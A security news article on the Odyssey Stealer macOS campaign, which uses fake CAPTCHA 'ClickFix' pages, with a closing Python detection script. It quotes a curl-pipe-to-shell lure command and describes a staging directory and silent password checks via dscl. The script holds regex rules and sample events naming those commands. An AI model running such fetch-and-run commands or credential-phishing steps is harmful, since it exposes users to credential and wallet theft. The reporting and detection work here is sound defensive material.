A sophisticated new malware campaign targeting macOS users has emerged, using deceptive "ClickFix" tactics to distribute malicious AppleScripts designed to harvest sensitive user credentials and financial information.
The campaign leverages typosquatted domains that closely mimic legitimate finance platforms and Apple App Store websites, creating a convincing facade that tricks users into executing dangerous commands on their systems.
The attack begins when users inadvertently visit malicious domains that present fake Cloudflare-style CAPTCHA prompts.
These seemingly legitimate verification pages instruct macOS users to copy and paste Base64-encoded commands into their terminal applications to prove they are not robots.
Once executed, these commands initiate a comprehensive data theft operation that targets browser credentials, cryptocurrency wallets, and sensitive personal information stored across multiple applications.
Cyfirma researchers identified this malware as the Odyssey Stealer, a rebranded version of the previously known Poseidon Stealer, which itself originated as a fork of the AMOS Stealer.
The research team uncovered multiple command-and-control panels linked to this activity, with infrastructure primarily hosted in Russia.
The malware demonstrates a clear preference for targeting users in Western countries, particularly the United States and the European Union, while conspicuously avoiding victims in Commonwealth of Independent States countries.
The Odyssey Stealer represents a concerning evolution in macOS-targeting malware, combining social engineering tactics with sophisticated technical capabilities.
Unlike traditional malware that relies on software vulnerabilities, this campaign exploits human psychology by presenting users with familiar-looking security prompts that appear to be routine verification procedures.
The attackers have carefully crafted their distribution websites to mirror trusted platforms, making detection particularly difficult for unsuspecting users.
Infection Mechanism and Payload Execution
The malware's infection mechanism relies on a multi-stage process that begins with domain typosquatting and culminates in comprehensive system compromise.
ClickFix distribution flow (Source – Cyfirma)
When users visit the malicious domains, they encounter professionally designed pages that replicate the appearance of legitimate CAPTCHA verification systems.
The fake prompt displays instructions for macOS users to execute a command that appears as follows:
curl -s | sh
This command retrieves and executes an AppleScript from the attacker's command-and-control server. The script employs alphanumeric obfuscation to hide function names, though analysis reveals its true purpose.
Upon execution, the malware creates a temporary directory structure using the mkdir command, specifically establishing /tmp/lovemrtrump as its operational base.
The AppleScript then displays a convincing authentication prompt designed to capture the user's system password.
To validate stolen credentials silently, it leverages the macOS dscl command with the authonly parameter, ensuring the verification process remains hidden from the user.
This technique allows the malware to confirm password validity without triggering system alerts or user suspicion, demonstrating the attackers' deep understanding of macOS security mechanisms.
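The infection chain above (a curl one-liner piped into a shell, the /tmp/lovemrtrump staging directory, and the silent dscl authonly password check) maps directly onto process-execution telemetry. The following is an added detection example written for this article, not Cyfirma's code or the malware's; it runs over constructed sample events, and the URL and user name in them are hypothetical placeholders.

```python
"""Detection rules for the ClickFix / Odyssey Stealer chain described above.
Input events are (parent_process, command_line) pairs; on a real host they
would come from an EDR or the macOS unified log. The sample events below
are constructed for this example and were not captured from an infection."""
import re

# One regex per behaviour the article describes. Matching is on the
# command line only; the parent process is carried along for triage.
RULES = [
    # ClickFix lure: a curl one-liner piped straight into a shell
    ("clickfix_curl_pipe_sh", re.compile(r"\bcurl\b[^|]*\|\s*(sh|bash|zsh)\b")),
    # Staging directory the AppleScript creates with mkdir
    ("odyssey_staging_dir", re.compile(r"/tmp/lovemrtrump\b")),
    # Silent password validation through dscl -authonly
    ("dscl_authonly_validation", re.compile(r"\bdscl\b.*-authonly\b")),
]

# Constructed sample telemetry (hypothetical URL and user name)
SAMPLE_EVENTS = [
    ("Safari", "curl -s https://example.invalid/update.json"),   # benign: no pipe
    ("Terminal", "curl -s https://example.invalid/lure | sh"),   # pasted by the user
    ("sh", "mkdir -p /tmp/lovemrtrump"),
    ("osascript", "dscl . -authonly jdoe <password>"),
    ("Terminal", "ls -la /tmp"),
]

def match_event(cmdline):
    """Return the names of every rule whose pattern appears in cmdline."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(events):
    """Return (hits, chain_seen). hits lists each matching event with its rule
    names; chain_seen becomes True once a curl|sh launch has been followed by
    the staging directory or the dscl check, i.e. the full sequence, not an
    isolated curl pipe."""
    hits, seen, chain_seen = [], set(), False
    for parent, cmd in events:
        names = match_event(cmd)
        if not names:
            continue
        hits.append((parent, cmd, names))
        if "clickfix_curl_pipe_sh" in seen and set(names) & {
                "odyssey_staging_dir", "dscl_authonly_validation"}:
            chain_seen = True
        seen.update(names)
    return hits, chain_seen

if __name__ == "__main__":
    for parent, cmd, names in scan(SAMPLE_EVENTS)[0]:
        print(f"[{', '.join(names)}] parent={parent}: {cmd}")
```

A lone curl pipe from Terminal is worth a medium-severity alert on its own; the chain flag is the high-confidence signal.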